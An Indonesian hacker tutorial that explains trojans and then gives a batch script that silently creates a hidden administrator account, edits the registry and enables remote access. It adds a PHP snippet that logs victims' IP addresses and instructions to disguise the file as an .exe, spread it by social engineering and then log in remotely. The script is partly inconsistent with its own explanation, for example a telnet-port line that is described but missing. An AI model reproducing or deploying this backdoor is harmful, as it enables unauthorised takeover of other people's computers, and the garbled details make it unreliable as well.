Trojan horse atau Kuda Troya, dalam keamanan komputer merujuk kepada sebuah bentuk perangkat lunak yang mencurigakan (malicious software/malware) yang dapat merusak sebuah sistem atau jaringan. Dapat disebut sebagai Trojan Trojan berbeda dengan jenis perangkat lunak mencurigakan lainnya seperti virus komputer atau worm karena dua hal berikut: Trojan bersifat "stealth" (siluman dan tidak terlihat) dalam operasinya dan seringkali berbentuk seolah-olah program tersebut merupakan program baik-baik, sementara virus komputer atau worm bertindak lebih agresif dengan merusak sistem atau membuat sistem menjadi crash. Trojan tidak mereplikasi dirinya sendiri, sementara virus komputer dan worm melakukannya. Trojan berjalan sebagai sebuah layanan sistem, dan bekerja di latar belakang (background), sehingga Trojan-Trojan tersebut dapat menerima perintah dari penyerang dari jarak jauh. Ketika sebuah transmisi UDP atau TCP dilakukan, tapi transmisi tersebut dari port (yang berada dalam keadaan "listening") atau alamat yang tidak dikenali, maka hal tersebut bisa dijadikan pedoman bahwa sistem yang bersangkutan telah terinfeksi oleh Trojan Horse. OK gw kira itu saja pendahuluan kita...
Sekarang di sini kita mempunyai sebuah script dari bat yang gunanya untuk membuka port dan bisa untuk melakukan remote melewati telnet dan melakukan ShutDown secara remote, sama hal nya seperti trojan :
=============================================================== @echo off net user coba /add /expires:never net localgroup administrators coba /add echo Windows Registry Editor Version 5.00> c:\winst.reg echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList]>> c:\winst.reg echo "eminem"=dword:00000000>> c:\winst.reg REGEDIT /S c:\winst.REG DEL c:\winst.REG
echo [Components] > c:\bootlog~.txt echo TSEnabled = on >> c:\bootlog~.txt sysocmgr /i:%windir%\inf\sysoc.inf /u:c:\bootlog~.txt /q DEL c:\TS2.REG DEL c:\bootlog~.txt @start /b "iexplore.exe" www.google.com Exit ==================================================================== Perhatikan pada bagian berikut ini net user coba /add /expires:never net localgroup administrators coba /add
akan menambahkan user "coba" di echo "TelnetPort"=dword:29A>>user1.reg
dan akan membuka telnet port 666 [karena 29A adalah hasil hex dari 666] untuk merubahnya anda bisa mencoba menggunakan calculator lewat Run – Calc Lihat gambar di bawah ini :
Cukup merubah Dec ke Hex...
Dan pada bagian : @start /b "iexplore.exe" www.google.com
Apabila victim mengklik file bat ini akan membuka www.google.com yang gunanya untuk merecord IP sang victim dan bisa digunakan untuk serangan DDoS. Source Record Ip kira-kira seperti ini.
====================================================================== $logfile= 'record.html'; $IP = $_SERVER['REMOTE_ADDR']; $logdetails= date("F j, Y, g:i a") . ': ' . ''.$_SERVER['REMOTE_ADDR'].'>'.$_SERVER['REMOTE_ADDR'].''; $fp = fopen($logfile, "a"); fwrite($fp, $logdetails); fwrite($fp, " "); fclose($fp); ?> ====================================================================== Nah... sekarang kita mulai cara membuatnya, copy paste source code pertama kedalam notepad dan save dengan ekstensi bat [jangan lupa edit bagian2 pentingnya saja seperti user , port , rec IP]. Anda bisa merubahnya dengan exstensi exe menggunakan tools seperti bat2exe yang bisa di download di http://www.battoexe.com ]
Setelah itu silakan anda sebarkan file bat atau exe tadi di mana saja atau anda bisa melakukan percobaan dengan teman anda , tapi tentunya menggunakan teknik SKSD, hehehe dan yang lebih asiknya tidak satupun AntiVirus pun berhasil membacanya sebagai malicious code . setelah itu anda hanya perlu mengecek site record IP yang anda buat tadi dan anda bisa meremote melalui telnet dengan port 666 ( saya pernah mencobanya dengan Remote Desktop dan berhasil )
Nah... itulah tadi tutorial dari saya semoga bermanfaat buat pembaca sekalian
Disclaimer : Gunakan source code diatas hanya untuk sarana pembelajaran dan tidak untuk disalahgunakan dimasa mendatang.
Greets : eminem Thanks to HC, CyberDos, JatimCrew and Teh_Godfather Written by h4ck_Z
Pendahuluan...
